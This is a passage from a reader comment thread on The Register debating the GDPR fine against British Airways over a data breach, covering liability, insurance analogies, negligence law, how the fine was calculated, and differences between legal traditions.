        To continue the car example, there are two elements involved. One is liability in criminal law - that is only the responsibility of the car thief. The other would be civil liability. Again, that is the car thief's responsiiblity, but of course we know most thieves never pay for the cars they steal.

        Therefore of course, we usually insure our cars against theft. The insurer will pay the value for the stolen car or its damages, but only if the insured hasn't been negligent or sloppy. If you leave it unlocked with the keys in then you won't get covered. But leaving it in a dark alley in a dodgy part of town is usually not grounds to refuse payment (I think - depends on the policy I suppose - foreign travel to some countries is excluded).

        Taking this together, I agree with the original poster - this is like the police fining the car owner (or say the friend of the owner who was using the car) - I guess the question is, has the friend done the DP equivalent of leaving the keys in the ignition, or just parked it somewhere dodgy? I guess in the former case a fine is legitimate, BUT it still is (to me) a very blunt tool to set a liability.

        In theory there is already negligence law which could allow an individual person to sue a data holder for negligently letting it leak out. But the victim would have to show some kind of loss. The scale of these fines suggests this link is absent (360 quid per person involved) - weird to set it by reference to the global revenue. Maybe one victim lost nothing, and another had 1,000s of pounds run up on their card. Each person should get their respective sum lost.

  27. amanfromMars 1 Silver badge

    The Nitty Gritty on the Insane Virtualised Cost of Doing New Business with 0 0Day Protection Cover

    Is any realistic valid insurance cover available to all parties such as a British Airways to ensure information and intelligence breaches are not possible and preventable?

    Failing that facility being ready for immediate secure supply, are not breaches and leaks not normal courses of action and fully to be expected rather than bizarrely penalised with fantastic fiat fines?

    So who fronts and dons the Dick Turpin mask for such daylight highway robbery?

    1. cynic56
      Joke

      Re: The Nitty Gritty - title too long for The Register etc.

      You are a bad person! My brother almost lost his job for (innocently) using the phrase N*tty Gr*tty (see, I can't even bear to type the words because they are so racist )- honestly!

      1. Intractable Potsherd

        Re: The Nitty Gritty - title too long for The Register etc.

        I hadn't heard this gem before, so I've just done some research. There is absolutely no - repeat no - evidence that the term "nitty-gritty" is racist. This ridiculous farce needs to be killed as soon as possible.

  28. Phil Kingston

    180 million...

    .... would have bought a lot of pen testing.

    Heck, 18m would have probably done it.

  29. Frau Blücher

    Watching the GDPR actually get used makes me uncomfortable. Besides the mental and ongoing costs of compliance, the actual enforcement seems to be an affront to basic principles of justice. BA's argument is a fair one, what is the harm done here - how does that link to the penalty awarded? That is a starting for damages awarded in normal civil claims in the common law world. And why does the regulator get to set the penalty? They act as rule maker (via guidance docs issued), prosecutor, and jury. Fine - this gets appealed to the proper courts, but usually this kind of right is granted only to police in fairly low level offences (e.g. speeding tickets). The scale of penalties creates vast power in a single regulator. And finally, it is essentially victim blaming - in most UK cases the data controller has been hacked, which is in fact a crime against them - imagine applying this logic to victims of sexual violence...

    The answer to all of this is that this a European invention and this is how things go in civil law countries. Ok fine, but it doesn't sit well with the common law tradition. And as usual it seems to me the UK regulator enforces the "rights" rigorously and hands out swingeing fines, even against local UK companies (when the fines were in reality calibrated to hit FB, Google etc.) - whereas various contintenal counterparts get away with fairly limited fines, if they get fined at all.,

  30. spold Silver badge

    747 payment settlement

    Looking forward to seeing the new 747 in "ICO Enforcement" livery

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like